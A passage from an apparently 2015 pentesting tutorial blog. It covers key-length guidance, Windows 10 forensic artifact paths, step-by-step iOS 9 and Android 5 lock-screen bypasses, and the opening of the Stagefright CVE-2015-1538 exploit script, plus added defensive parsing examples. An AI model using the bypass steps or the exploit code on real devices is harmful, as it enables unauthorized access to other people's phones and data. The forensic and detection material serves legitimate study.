Pentesting Tutorials, by BlackBarbie-bb<br />
All about keylength (posted 2015-09-25)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
I recently came across a site about key length which has amazing calculations and decided to share it with you.<br />
<br />
In most cryptographic functions, the key length is an important security parameter. Both academic and private organizations provide recommendations and mathematical formulas to approximate the minimum key size requirement for security. Despite the availability of these publications, choosing an appropriate key size to protect your system from attacks remains a headache as you need to read and understand all these papers.<br /><br />This web site implements mathematical formulas and summarizes reports from well-known organizations allowing you to quickly evaluate the minimum security requirements for your system. You can also easily compare all these techniques and find the appropriate key length for your desired level of protection. The lengths provided here are designed to resist mathematic attacks; they do not take algorithmic attacks, hardware flaws, etc. into account.<br /> <br /> <br />
Site: http://www.keylength.com/en/compare/<br />
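As an added illustration of the kind of formula such a comparison rests on (this is not code from the site or from the original post): the general number field sieve cost estimate, with the constants used in NIST's FIPS 140-2 Implementation Guidance, maps an RSA/DH modulus size to an approximate symmetric-equivalent strength. The function names are chosen here, and the elliptic-curve column assumes the usual rule that a curve needs about twice as many bits as the target strength.

```python
import math

# Constants of the NIST FIPS 140-2 Implementation Guidance estimate:
# 1.923 is (64/9)**(1/3) from the number field sieve running time,
# 4.69 is the calibration offset used there.
NFS_CONSTANT = 1.923
CALIBRATION = 4.69


def rsa_strength_bits(modulus_bits):
    """Approximate symmetric-equivalent strength of an RSA/DH modulus."""
    if modulus_bits < 512:
        raise ValueError("estimate is not meaningful for very small moduli")
    ln_n = modulus_bits * math.log(2)          # natural log of the modulus
    work = NFS_CONSTANT * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3)
    return (work - CALIBRATION) / math.log(2)


def min_modulus_bits(target_strength, step=256, limit=65536):
    """Smallest modulus size (multiple of `step`) reaching the target strength."""
    size = 512
    while size <= limit:
        if rsa_strength_bits(size) >= target_strength:
            return size
        size += step
    raise ValueError("target strength not reachable below %d bits" % limit)


def comparison_row(target_strength):
    """One comparison row: symmetric bits, RSA/DH modulus bits, curve bits."""
    return {
        "symmetric_bits": target_strength,
        "rsa_modulus_bits": min_modulus_bits(target_strength),
        # Generic square-root attacks on elliptic curves halve the bit length.
        "ecc_curve_bits": 2 * target_strength,
    }


if __name__ == "__main__":
    for bits in (1024, 2048, 3072, 4096):
        print("RSA-%d is roughly %.0f-bit strength" % (bits, rsa_strength_bits(bits)))
    for target in (112, 128, 192):
        print(comparison_row(target))
```

Like the figures on the site, these numbers only model the best known mathematical attack on the modulus; they say nothing about implementation flaws or side channels.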
<br />
<br />
</div>
Windows 10 hacks (posted 2015-09-24)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
The following information will help you with some hacks in Windows 10.<br />
<br />
<div style="text-align: left;">
All credit for this post goes to Brent Muir and the Security Affairs editor, since it was they
who shared a presentation covering all of these topics. The link to his presentation is at the
bottom of the post.</div>
<h3 style="text-align: left;">
File Systems / Partitions</h3>
<b>Supported File Systems:</b><br /><br />
NTFS, FAT32, exFAT<br />
<br />Default Partition structure:<br />
<br />- “Windows” – core OS (NTFS)<br />- “Recovery” (NTFS)<br />- “Reserved”<br />- “System” – UEFI (FAT32)<br />- “Recovery Image” (NTFS)<br />
<br />
<h3 style="text-align: left;">
Registry Hives</h3>
<div style="text-align: left;">
- Registry hives format has not changed</div>
<div style="text-align: left;">
<br /> Can be examined with numerous tools <br /> (e.g. RegistryBrowser, RegistryViewer, X-Ways Forensics, etc.)<br /><br />- Location of important registry hives:</div>
<div style="text-align: left;">
<br />\Users\user_name\NTUSER.DAT<br />\Windows\System32\config\DEFAULT<br />\Windows\System32\config\SAM<br />\Windows\System32\config\SECURITY<br />\Windows\System32\config\SOFTWARE<br />\Windows\System32\config\SYSTEM</div>
<br />
<h3 style="text-align: left;">
Event Logs </h3>
- EVTX log format has not changed<br />
<br /> Can be examined with numerous tools <br /> (e.g. X-Ways Forensics, etc.)<br /><br />- Location of EVTX logs:<br />
<br />\Windows\System32\winevt\Logs\<br />
<br />
<br />
<h3 style="text-align: left;">
Event Logs – Windows Store </h3>
<div style="text-align: left;">
<br />\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-RbLSed3kj94/VbtAaviimeI/AAAAAAAAA1A/oJbhIUlEXUI/s1600/windows10.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="http://4.bp.blogspot.com/-RbLSed3kj94/VbtAaviimeI/AAAAAAAAA1A/oJbhIUlEXUI/s400/windows10.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-nuAgEfohNYY/VbtQZjteOtI/AAAAAAAAA1Q/FB9b6S1rAaQ/s1600/windows10-2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://4.bp.blogspot.com/-nuAgEfohNYY/VbtQZjteOtI/AAAAAAAAA1Q/FB9b6S1rAaQ/s400/windows10-2.jpg" width="400" /> </a></div>
<h3 class="separator" style="clear: both; text-align: justify;">
Prefetch</h3>
<div class="separator" style="clear: both; text-align: justify;">
\Windows\Prefetch\<br /> </div>
<h3 style="text-align: left;">
Shellbags</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- NTUSER.dat</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />\SOFTWARE\Microsoft\Windows\Shell\Bags\<br /><br />- UsrClass.dat </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
LNK Shortcuts</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- LNK format has not changed</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /> Can be examined with numerous tools <br /> (e.g. X-Ways Forensics, etc.)<br /><br />- Useful fields:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /> Hostname<br /> MAC Address<br /> Volume ID<br /> Owner SID<br /> MAC Times</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Thumbcache</h3>
<div class="separator" style="clear: both; text-align: justify;">
Location of Thumbcache files:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />\Users\user_name\AppData\Local\Microsoft\Windows\Explorer\</div>
<h3 style="text-align: left;">
Recycle Bin</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Recycle Bin artefacts have not changed<br />$I<br />Still provides original file name and path<br /><br />$R<br />Original file</div>
<h3 style="text-align: left;">
Volume Shadow Copies</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- vssadmin tool still provides list of current VSCs </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /><a href="http://1.bp.blogspot.com/-DvvhTYGP4Ro/VbtSXrts2tI/AAAAAAAAA1c/Eta9KjD6XHc/s1600/windows10-3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://1.bp.blogspot.com/-DvvhTYGP4Ro/VbtSXrts2tI/AAAAAAAAA1c/Eta9KjD6XHc/s400/windows10-3.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Windows Indexing Service</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Windows indexing service is an evidentiary gold mine<br /><br />Potentially storing emails and other binary items<br />Great as dictionary list for password cracking<br /><br />- Stored in an .EDB file<br /><br />Can be interpreted by EseDbViewer, ESEDatabaseView or X-Ways Forensics<br />If “dirty” dismount, need to use esentutl.exe<br /><br />- In Windows 10 stored in the following directory:<br />C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Cortana</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Windows 10 features “Cortana”, a personal assistant, which expands upon the unified search platform introduced in Windows 8:<br /><br />Search encompasses local files, Windows Store & online content<br />Can set reminders<br />Can initiate contact (e.g. write emails)<br /><br />- Cortana Databases (EDBs):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\AppData\Indexed DB\IndexedDB.edb <br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\ESEDatabase_CortanaCoreInstance\CortanaCoreDb.dat<br /> <br />Interesting Tables:<br /><br />LocationTriggers<br />Latitude/Longitude and Name of place results<br />Geofences<br />Latitude/Longitude for where location based reminders are triggered <br />Reminders<br />Creation and completion time (UNIX numeric value)</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
- The following databases contain a list of contacts synched from email accounts:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\Contacts_xxxxx.cfg<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\Contacts_xxxxx.cfg.txt</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Notification Centre</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- The following databases contain a list of notifications:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\Notifications\appdb.dat<br /><br />Toast notifications are stored in embedded XML<br /><br /><a href="http://2.bp.blogspot.com/-v3NC6jgOtaM/VbtUPRcXJlI/AAAAAAAAA1o/PT8TvMStFAw/s1600/windows10-4.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://2.bp.blogspot.com/-v3NC6jgOtaM/VbtUPRcXJlI/AAAAAAAAA1o/PT8TvMStFAw/s400/windows10-4.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Picture Password</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- “Picture Password” is an alternate login method where gestures on top of a picture are used as a password<br /><br />- This registry key details the path to the location of the “Picture Password” file:<br /><br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\PicturePassword\user_GUID<br /><br />- Path of locally stored Picture Password file:<br /><br />C:\ProgramData\Microsoft\Windows\SystemData\user_GUID\ReadOnly\PicturePassword\background.png<br /> </div>
<h3 style="text-align: left;">
Applications</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Applications (Apps) that utilise the Metro Modern UI are treated differently to programs that work in desktop mode<br /><br />- Apps are installed in the following directory:<br /><br />\Program Files\WindowsApps\<br /><br />- Settings and configuration DBs are located in following directories:<br /><br />\Users\user_name\AppData\Local\Packages\package_name\LocalState\ <br /><br />Two DB formats:<br />SQLite DBs (.SQL)<br />Jet DBs (.EDB) </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Windows Store</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Apps are purchased/installed via the Windows Store<br /><br />- During the Insider Preview there was a Beta Store which contained Windows 10-compatible Apps (e.g. Microsoft Office Apps)<br /><br />- Registry key of installed applications:<br /><br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\<br /><br />- List of deleted applications:<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\</div>
<h3 style="text-align: left;">
Edge Browser</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- New web browser and rendering engine (Spartan)<br /><br />- Same as IE10, records no longer stored in Index.DAT files, stored in EDB<br /><br />- Edge settings are stored in the following file:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxxx\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\xxxxx\DBStore\spartan.edb
<br /> <br />- Edge cache stored in the following directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\#!001\MicrosoftEdge\Cache\<br /><br />- Last active browsing session stored: <br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\MicrosoftEdge\User\Default\Recovery\Active\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Browser History Records </h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Edge (and IE) history records stored in the following database:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat <br /><br />- This is actually an .EDB file<br />- Can be interpreted by EseDbViewer or ESEDatabaseView <br />- Might be a “dirty” dismount, need to use esentutl.exe<br />- Database also stores Cookies </div>
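The “dirty” dismount mentioned for Windows.edb and WebCacheV01.dat can be checked before opening a copy in a viewer. The following is an added example, not part of the original post or the presentation: it reads the database state from the ESE file header, assuming the header layout in the public libesedb format documentation (signature EF CD AB 89 at offset 4, 32-bit state at offset 52). The function names and the sample headers are constructed for illustration.

```python
import struct

ESE_SIGNATURE = 0x89ABCDEF      # stored little-endian as EF CD AB 89
SIGNATURE_OFFSET = 4            # after the 4-byte header checksum
STATE_OFFSET = 52               # assumption: layout per libesedb documentation
STATES = {
    1: "JustCreated",
    2: "DirtyShutdown",
    3: "CleanShutdown",
    4: "BeingConverted",
    5: "ForceDetach",
}


def ese_state(header):
    """Return the database state name from the first bytes of an .edb/.dat file."""
    if len(header) < STATE_OFFSET + 4:
        raise ValueError("header too short to contain the state field")
    (signature,) = struct.unpack_from("<L", header, SIGNATURE_OFFSET)
    if signature != ESE_SIGNATURE:
        raise ValueError("not an ESE database (signature mismatch)")
    (state,) = struct.unpack_from("<L", header, STATE_OFFSET)
    return STATES.get(state, "Unknown(%d)" % state)


def needs_recovery(header):
    """True when the file was not cleanly dismounted and should be repaired
    on a working copy with esentutl.exe before it is parsed."""
    return ese_state(header) != "CleanShutdown"


def triage_file(path):
    """Read only the header of an acquired copy and report (state, action)."""
    with open(path, "rb") as handle:
        header = handle.read(4096)
    state = ese_state(header)
    if needs_recovery(header):
        action = "run esentutl.exe on a working copy, keep the original untouched"
    else:
        action = "open a working copy directly in an ESE viewer"
    return state, action


def make_header(state):
    """Constructed sample header carrying only the signature and state fields."""
    header = bytearray(4096)
    struct.pack_into("<L", header, SIGNATURE_OFFSET, ESE_SIGNATURE)
    struct.pack_into("<L", header, STATE_OFFSET, state)
    return bytes(header)


if __name__ == "__main__":
    for value in (2, 3):
        sample = make_header(value)
        print(ese_state(sample), "-> recovery needed:", needs_recovery(sample))
```

`esentutl /mh` on the same file prints the state as well; the check here is useful when triaging many acquired databases on a non-Windows analysis host.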
<h3 style="text-align: left;">
Internet Explorer (legacy)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Internet Cache stored in this directory:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\INetCache\<br /><br />- Internet Cookies stored in this directory:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\INetCookies\</div>
<h3 style="text-align: left;">
Email (Mail application)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Body of emails are stored in TXT or HTML format <br /><br />Can be analysed by a number of tools<br />Stored in the following directory:<br /><br />\Users\user_name\AppData\Local\Comms\Unistore\data\ <br /><br />- Metadata of emails are stored in the following DB (EDB format):<br /><br />\Users\user_name\AppData\Local\Comms\UnistoreDB\store.vol <br /><br />- Attachments<br />- Email header<br />- Contact information</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Unified Communication </h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Unified Communication (UC) is a built-in Microsoft application
that brings together all of the following social media platforms (by
default):<br /><br />Appears to be scaled back from Windows 8.x (less integrated than the previous People App)<br /><br />- UC settings are stored in the following DB:<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps…\LocalState\livecomm.edb </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div style="text-align: left;">
<b>Interesting Tables:</b></div>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Account<br />SourceID<br />List of accounts (e.g WL = Windows Live, Skype, TWITR, LI = LinkedIn)<br />DomainTag<br />Username for each account<br /><br />- Contact<br />List of synched contacts across all account platforms<br /><br />- Event<br />Calendar entries (including birthdays of contacts if synched to Windows Live) and locations<br /><br />- MeContact<br />Further details about owner accounts<br /><br />-Person and PersonLink<br />Further details about each contact including what account they link back to (e.g Skype)</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Locally cached contact entries are stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps_xxxxx\LocalState\Indexed\LiveComm\xxxxx\xxxxx\People\AddressBook\<br /> <br />- Contact photos are stored in this directory (JPGs):<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps_xxxx\LocalState\LiveComm\xxxx\xxxx\UserTiles\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Twitter App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- History DB located in following file:<br /><br />\Users\user_name\AppData\Local\Packages\xxxx.Twitter_xxxxxxx\LocalState\twitter_user_id\twitter.sqlite<br /><br />- SQLite3 format DB<br /><br />11 Tables in DB<br /><br />Relevant tables:<br />- messages – holds tweets & DMs<br />- search_queries – holds searches conducted in Twitter app by user<br />- statuses – lists latest tweets from accounts being followed<br />- users – lists user account and accounts being followed by user</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
- Settings located in file:<br /><br />\Users\user_name\AppData\Local\Packages\xxxxx.Twitter_xxxx\Settings\settings.dat<br /><br />- Includes user name (@xxxxx)<br />- Details on profile picture URL<br />- Twitter ID number</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Skype App (legacy)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- The Skype App was discontinued with Windows 10 <br /><br />Windows 10 prompts you to download the desktop Skype application </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
OneDrive App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Built-in by default, API allows all programs to save files in OneDrive<br /><br />- List of Synced items located in file:<br />\Users\user_name\AppData\Local\Microsoft\Windows\OneDrive\settings\xxxxxxxx.dat<br /><br />- Locally cached items are stored in directory:<br />\Users\user_name\OneDrive\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Microsoft Office Apps</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- With the release of the Windows Insider program Microsoft introduced the Office Mobile Apps<br /><br />If you have a valid Office365 account then you can edit and create documents<br />Otherwise these Apps are read-only</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Word App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Word_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Word_xxxx\LocalState\OfficeFileCache\ <br /><br />- Files stored as .FSD extension - actually data embedded<br />- Can be manually carved from FSD file</div>
<h3 style="text-align: left;">
Excel App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Excel_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Excel_xxxx\LocalState\OfficeFileCache\<br /><br />Files stored as .FSD extension actually data embedded<br />Can be manually carved from FSD file</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
PowerPoint App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.PowerPoint_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.PowerPoint_xxxx\LocalState\OfficeFileCache\<br /> <br />Files stored as .FSD extension - actually data embedded<br />Can be manually carved from FSD file</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 class="separator" style="clear: both; text-align: justify;">
OneNote App</h3>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.OneNote_xxxx\LocalState\AppData\Local\OneNote\16.0\ <br /><br />- Files stored as xxxx.bin extension <br />Encoded binary files <br />Embedded graphics such as PNG or JPG</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Maps App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Recent places stored in this file (XML):<br />\Users\user_name\AppData\Local\Packages\Microsoft.WindowsMaps_xxxx\LocalState\Graph\xxxx\Me\00000000.ttl<br /><br />Latitude/Longitude<br />Dates modified (searched)</div>
<h3 style="text-align: left;">
Memory Acquisition</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- WinPMEM (tested versions 1.6.2 & 2.0.1):<br /><br />Run as Administrator<br />Has to extract driver to local temp location<br />V1.6.2 running process ~10MB<br />V2.0.1 running process ~80MB<br /><br />- FTK Imager:<br /><br />Run as Administrator<br />Running process ~15MB</div>
<h3 style="text-align: left;">
Live Disk Acquisition</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- FTK Imager<br /><br />Can be used for Physical or Logical acquisition<br /><br />- X-Ways Forensics<br /><br />Can be used for Physical or Logical acquisition<br /></div>
<h3 style="text-align: left;">
Sources: </h3>
<a href="http://www.slideshare.net/bsmuir/windows-10-forensics-os-evidentiary-artefacts">Presentation</a><br />
<a href="http://accessdata.com/product-download?/support/product-downloads">FTK Imager</a><br />
<a href="http://www.nirsoft.net/utils/ese_database_view.html">Nirsoft ESEDatabaseView</a><br />
<a href="https://lockandcode.com/software/registry_browser">RegistryBrowser</a><br />
<a href="https://github.com/google/rekall/releases">WinPMEM</a>
</div>
Hack photo library of iOS 9 (posted 2015-09-24)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Instructions to bypass the passcode:
<br />
<ul>
<li>Take the Apple device running the iOS 9 and enter an incorrect passcode four times.</li>
<li>Depending on the length of your passcode, for the fifth attempt
enter 3 or 5 digits and for the last one, press and hold the Home button
to run Siri immediately followed by the 4th digit.</li>
<li>Once Siri appears, ask the assistant for the time.</li>
<li>Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.</li>
<li>Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on “Share”.</li>
<li>Tap the ‘Message’ icon in the Share Sheet, and again type something
random, hit Return and double tap on the contact name on the top.</li>
<li>Select “Create New Contact,” and Tap on “Add Photo” and then on “Choose Photo”.</li>
<li>At this point, you’ll now be able to access the entire photo library
on the iOS device, which is still locked with a passcode. Now browse
and view any photo from the Photo album individually.</li>
</ul>
Hope it helps. </div>
Exploiting Android 5.0 to unlock the session (posted 2015-09-17)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
The security researcher <i>John Gordon</i> has discovered a very
simple way to bypass the mobile lock feature implemented on smartphones
running Android 5.0 and 5.1 (Build LMY48M).<br />
Mechanisms like Password lock, Pattern lock and PIN lock are used by
almost every mobile user to protect his device from unauthorized
physical access.<br />
Gordon discovered a vulnerability that could be exploited to unlock an Android smartphone (<i>5.0 build LMY48I</i>)
with a locked screen. The operation crashes the user
interface for the password screen and opens the doors of the device.<br />
The vulnerability dubbed as “Elevation of Privilege Vulnerability in Lockscreen” has been coded as CVE-2015-3860.<br />
Below are the <a href="http://thehackernews.com/2015/09/bypass-android-lockscreen.html" target="_blank">steps</a> to unlock the screen by forcing the camera app to crash.<br />
<ul>
<li><em>Get the device and open the Emergency dialer screen.</em></li>
<li><em>Type a long string of numbers or special characters in the input
field and copy-n-paste a long string continuously till its limit
exhausts.</em></li>
<li><em>Now, copy that large string.</em></li>
<li><em>Open up the camera app accessible without a lock.</em></li>
<li><em>Drag the notification bar and push the settings icon, which will show a prompt for the password.</em></li>
<li><em>Now, paste the earlier copied string continuously to the input field of the password, to create an even larger string.</em></li>
<li><em>Come back to </em>camera <em>and divert yourself towards
clicking pictures or increasing/decreasing the volume button with
simultaneously tapping the password input field containing the large
string in multiple places.</em></li>
</ul>
The Android user will notice that the soft buttons (home and back button)
at the bottom of the screen disappear when the camera app is about
to become unresponsive. The app will then suddenly crash and take the user to the
Home Screen of the device.<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/09/android-5-hack.jpg"><img alt="android 5 hack" class="aligncenter wp-image-40187" height="281" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/09/android-5-hack.jpg" width="500" /></a><br />
<br />
<span class="embed-youtube" style="display: block; text-align: center;">Note: Google has already released a patch for it, but if you have not yet updated your phone, kindly update it.</span><br />
</div>
Stagefright vulnerability code (posted 2015-09-14)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Zimperium recently announced the Stagefright bug in Android, and the developers have released exploit code for it.<br />
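A defender's view of the same bug, as an added example that is not part of the original post or of the Zimperium code: the exploit's header names an integer overflow in the MP4 'stsc' atom handling, and its make_stsc function writes an entry count of 0xc0000000 + num_alloc into that atom. The Python 3 code here walks a file's atoms and flags any 'stsc' whose entry count cannot fit in the atom or overflows 32 bits when multiplied by the 12-byte entry size; the function names and both sample buffers are constructed for illustration.

```python
import struct

# Container atoms on the path to the sample table: moov/trak/mdia/minf/stbl.
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
ENTRY_SIZE = 12            # three big-endian 32-bit fields per stsc entry
U32_MAX = 0xFFFFFFFF


def atom(tag, payload=b""):
    """Build one atom (32-bit length, FourCC, payload) for the samples below."""
    return struct.pack(">L", len(payload) + 8) + tag + payload


def walk_atoms(buf, start=0, end=None):
    """Yield (tag, offset, payload) for every atom, descending into containers.

    A payload of None marks an atom whose declared length is unusable here:
    shorter than its own header or running past its parent. The 64-bit and
    to-end-of-file length encodings (size 1 and 0) are reported the same way.
    """
    end = len(buf) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, tag = struct.unpack_from(">L4s", buf, pos)
        if size < 8 or pos + size > end:
            yield tag, pos, None
            return
        yield tag, pos, buf[pos + 8:pos + size]
        if tag in CONTAINERS:
            yield from walk_atoms(buf, pos + 8, pos + size)
        pos += size


def check_stsc(payload):
    """Return the reasons an stsc payload looks malformed (empty list if sane)."""
    if len(payload) < 8:
        return ["payload shorter than its version and count fields"]
    _version_flags, count = struct.unpack_from(">LL", payload, 0)
    table_bytes = count * ENTRY_SIZE
    reasons = []
    if table_bytes > U32_MAX:
        reasons.append("entry count %#x times %d overflows 32 bits"
                       % (count, ENTRY_SIZE))
    if 8 + table_bytes > len(payload):
        reasons.append("declares %d entries but carries %d bytes of table"
                       % (count, len(payload) - 8))
    return reasons


def scan(buf):
    """Return a list of (offset, tag, reasons) for every suspicious atom."""
    findings = []
    for tag, offset, payload in walk_atoms(buf):
        if payload is None:
            findings.append((offset, tag, ["length invalid or exceeds parent"]))
        elif tag == b"stsc":
            reasons = check_stsc(payload)
            if reasons:
                findings.append((offset, tag, reasons))
    return findings


def wrap(stsc):
    """Nest an stsc atom inside the usual container chain (constructed sample)."""
    for tag in (b"stbl", b"minf", b"mdia", b"trak", b"moov"):
        stsc = atom(tag, stsc)
    return atom(b"ftyp", b"isom\x00\x00\x00\x00") + stsc


# Constructed samples: two real entries versus a count the atom cannot hold.
CLEAN = wrap(atom(b"stsc", struct.pack(">LL", 0, 2) + b"\x00" * 24))
SUSPECT = wrap(atom(b"stsc", struct.pack(">LL", 0, 0xC0000002) + b"\x00" * 24))

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(name, scan(sample))
```

The same two checks (count against atom size, and the multiplication against the integer width) are what a parser needs before it allocates or copies the table.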
<br />
<br />
Code <a href="https://raw.githubusercontent.com/jduck/cve-2015-1538-1/master/Stagefright_CVE-2015-1538-1_Exploit.py" target="_blank">source</a> :<br />
<br />
<pre>#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
    if len(tag) != 4:
        raise 'Yo! They call it "FourCC" for a reason.'
    ret = struct.pack('>L', len(data) + 8)
    ret += tag
    ret += data
    return ret
#
# Make an 'stco' atom - Sample Table Chunk Offsets
#
def make_stco(extra=''):
    ret = struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mNumChunkOffsets
    return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
    ret = struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mDefaultSampleSize
